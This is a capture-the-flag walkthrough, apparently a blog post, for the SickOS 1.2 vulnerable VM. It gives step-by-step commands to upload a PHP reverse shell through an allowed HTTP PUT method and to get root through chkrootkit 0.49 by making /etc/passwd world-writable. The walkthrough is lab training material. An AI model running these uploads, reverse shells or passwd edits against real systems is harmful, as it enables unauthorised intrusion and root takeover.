SICKOS: 1.2 walkthrough
first download your vulnerable box using this link after downloading this vm configure on virtual box
Enumeration Start
first we scan network and find vulnerable box ip address so now we use netdiscover command for scan network
$ sudo netdiscover
now using nmap we scan vulnerable box ip address
$ nmap -v -p- 192.168.1.238
we have two port for enumeration now let’s scan with nmap with defalt script and os detection
$ sudo nmap -sC -sV -sT -sU -A -p 22,80 192.168.1.238
let’s enumerate port 80 and see what is on port 80 so let’s hit ip address on browser and see
we see simple image on port 80 now bruetforce using dirsearch directory on port 80 maybe found some interesting content
$ dirsearch -u http://192.168.1.238/
after dirsearch scan we have test directory now we check test directory
after enumerating test directory we don’t have any file on test directory let’s try some more tips
we have curl command for checking which method is allow on target host now we use curl command and check method
$ curl -v -X OPTIONS http://192.168.1.238/test
we have PUT method allow so now let’s try upload file on this box first we upload php info file to insure that php available on this server
now i am connected diffrent network so don’t worry about ip address now my machine ip address is 192.168.43.156 note: please don’t change your network it’s my issue for changing network let’s put phpinfo file on server
$ curl -v -X PUT -d "<?php phpinfo(); ?>" http://192.168.43.156/test/phpinfo.php
phpinfo file execute on server now we sure php installed on this box
let’s upload reverse shell for and make a terminal connection with this box
we will use curl command for uploading file on server
$ cp /usr/share/webshells/php/php-reverse-shell.php .
after copying reverse shell we will update our ip address and port on php-reverse-shell.php file now
$ vim php-reverse-shell.php
after updating ip address on php-reverse-shell.php file upload file on server using curl command
$ curl -T php-reverse-shell.php --url http://192.168.1.249/test/php-reverse-shell.php -0
let’s check reverse shell and execute it
now start reverse shell and after starting nc execute php-reverse-shell.php
$ sudo nc -nlvp 443
now convert normal shell to fully interective shell using this link and enumerate box
after enumerating box we see a chkrootkit file on crontab
now check the version of chkrootkit
$ chkrootkit -V
chkrootkit version 0.49 version is vulnereble with local privilege escalation this version exploit available on exploit db click this link and see exploit
now according to exploit create file on tmp directory and get privilege escalation
$ ls -lah /etc/passwd
now you see /etc/passwd file permission now we escalate privilege using chkrootkit vulnerable version
now going on /tmp directory and make a file on tmp directory
$ cd /tmp
$ ls
$ nano update
update some containt on update file
#!/bin/bash
chmod 777 /etc/passwd
now giving executue permission on this file
after creating update file wait when your cronjob task is run you get 777 permission on passwd file
now update root password on passwd file
first generate linux password using openssl command
$ openssl passwd 1234
now update this password on /etc/passwd file using nano text editor
now switch root user using password 1234
$ su root
Password:1234
now we will sucessfully enumerate this box and now we enjoy PUT method and chkrootkit 0.49 vulnerability
happy hacking :)
mr. hide
